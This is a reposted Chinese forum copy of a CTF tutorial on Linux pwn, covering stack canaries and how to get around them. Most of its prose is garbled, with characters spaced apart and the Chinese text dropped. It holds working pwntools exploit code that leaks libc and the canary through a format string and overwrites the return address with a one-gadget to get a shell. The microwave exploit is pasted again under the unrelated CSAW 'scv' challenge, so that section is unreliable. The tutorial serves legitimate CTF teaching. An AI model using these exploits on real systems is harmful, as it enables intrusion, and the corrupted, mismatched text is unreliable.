搜索

[19529] 2019-09-19_CTF必备技能丨LinuxPwn入门教程——stackcanary与绕过的思路

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2019-09-19_CTF必备技能丨LinuxPwn入门教程——stackcanary与绕过的思路 C T F L i n u x   P w n s t a c k   c a n a r y i   2 0 1 9 - 0 9 - 1 9 L i n u x   P w n i P w n L i n u x   P w n i 3 8 6 / a m d 6 4 L i n u x   P w n P w n D o c k e r p y t h o n i L i n u x   P w n s t a c k   c a n a r y 1 5 c a n a r y e b p e i p s t a c k   c a n a r y 使 c a n a r y 使 c a n a r y c a n a r y 使 c h e c k s e c S t a c k C a n a r y   f o u n d c a n a r y 退
c a n a r y 退 c a n a r y s t a c k _ c h k _ f a i l c a n a r y s t a c k _ c h k _ f a i l c a n a r y c a n a r y c a n a r y p a y l o a d c a n a r y 使 c a n a r y ~ / i n s o m n i h a c k   C T F   2 0 1 6 - m i c r o w a v e / m i c r o w a v e c h e c k s e c 1 2
m a i n 使 f g e t s s u b _ F 0 0 使 _ _ p r i n t f _ c h k 2 s u b _ 1 0 0 0 r e a d F O R T I F Y 使 % n c a n a r y c a l l   _ _ p r i n t f _ c h k 西
l i b c s t d o u t s t d i n 6 c a n a r y o n e   g a d g e t   R C E 2 c a n a r y r i p 8 i o . s e n d l i n e ( ' 1 ' )                                                                                 # 使 1 i o . r e c v ( ' u s e r n a m e :   ' ) i o . s e n d l i n e ( ' % p . ' * 8 )                                                                 # l i b c c a n a r y i o . r e c v u n t i l ( ' p a s s w o r d :   ' ) i o . s e n d l i n e ( ' n 0 7 _ 7 h 3 _ f l 4 6 ' )                                                 # l e a k _ d a t a   =   i o . r e c v u n t i l ( ' [ M i c r o W a v e ] :   ' ) . s p l i t ( ) [ 1 ] . s p l i t ( ' . ' )                 l e a k _ l i b c   =   i n t ( l e a k _ d a t a [ 0 ] ,   1 6 ) o n e _ g a d g e t _ a d d r   =   l e a k _ l i b c   -   0 x 3 c 3 7 6 0   +   0 x 4 5 5 2 6                                 # o n e   g a d g e t   R C E c a n a r y   =   i n t ( l e a k _ d a t a [ 5 ] ,   1 6 ) l o g . i n f o ( ' L e a k   c a n a r y   =   % # x ,   o n e   g a d g e t   R C E   a d d r e s s   =   % # x '   % ( c a n a r y ,   o n e _ g a d g e t _ a d d r ) )
g e t s h e l l
c a n a r y c a n a r y ~ / C S A W   Q u a l s   C T F   2 0 1 7 - s c v / s c v C + + 6 4 E L F I D A   F 5 f r o m   p w n   i m p o r t   * c o n t e x t . u p d a t e ( o s   =   ' l i n u x ' ,   a r c h   =   ' a m d 6 4 ' ) i o   =   r e m o t e ( ' 1 7 2 . 1 7 . 0 . 2 ' ,   1 0 0 0 1 ) i o . s e n d l i n e ( ' 1 ' )                                                                                 # 使 1 i o . r e c v ( ' u s e r n a m e :   ' ) i o . s e n d l i n e ( ' % p . ' * 8 )                                                                 # l i b c c a n a r y i o . r e c v u n t i l ( ' p a s s w o r d :   ' ) i o . s e n d l i n e ( ' n 0 7 _ 7 h 3 _ f l 4 6 ' )                                                 # l e a k _ d a t a   =   i o . r e c v u n t i l ( ' [ M i c r o W a v e ] :   ' ) . s p l i t ( ) [ 1 ] . s p l i t ( ' . ' )                 l e a k _ l i b c   =   i n t ( l e a k _ d a t a [ 0 ] ,   1 6 ) o n e _ g a d g e t _ a d d r   =   l e a k _ l i b c   -   0 x 3 c 3 7 6 0   +   0 x 4 5 5 2 6                                 # o n e   g a d g e t   R C E c a n a r y   =   i n t ( l e a k _ d a t a [ 5 ] ,   1 6 ) l o g . i n f o ( ' L e a k   c a n a r y   =   % # x ,   o n e   g a d g e t   R C E   a d d r e s s   =   % # x '   % ( c a n a r y ,   o n e _ g a d g e t _ a d d r ) ) p a y l o a d   =   " A " * 1 0 3 2                                                                                 # p a d d i n g p a y l o a d   + =   p 6 4 ( c a n a r y )                                                                 # c a n a r y p a y l o a d   + =   " B " * 8                                                                                 # p a d d i n g p a y l o a d   + =   p 6 4 ( o n e _ g a d g e t _ a d d r )                                 # o n e   g a d g e t   R C E i o . s e n d l i n e ( ' 2 ' )                                                                                 # 使 2 i o . r e c v u n t i l ( ' # >   ' ) i o . s e n d l i n e ( p a y l o a d ) s l e e p ( 0 . 5 )                                                                 i o . i n t e r a c t i v e ( )
1
1 2 3 m a i n 3 退 m a i n c a n a r y 2 2 c a n a r y c a n a r y
1 6 8 . . . . . . . x 0 0 c a n a r y c a n a r y c a n a r y 0 0 . c a n a r y c a n a r y 1 6 8 + 1 0 0 c a n a r y
使 2 c a n a r y 7 0 x 3 7 c a n a r y l e a k c a n a r y c a n a r y s h e l l c a n a r y p a d d i n g A B C D E 便 i o . r e c v u n t i l (   ) c a n a r y l e a k   c a n a r y l e a k   c a n a r y c a n a r y c a n a r y 3 2 x 0 0 0 x 1 0 0 ^ 3 = 1 6 7 7 7 2 1 6 c a n a r y 6 4 c a n a r y
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理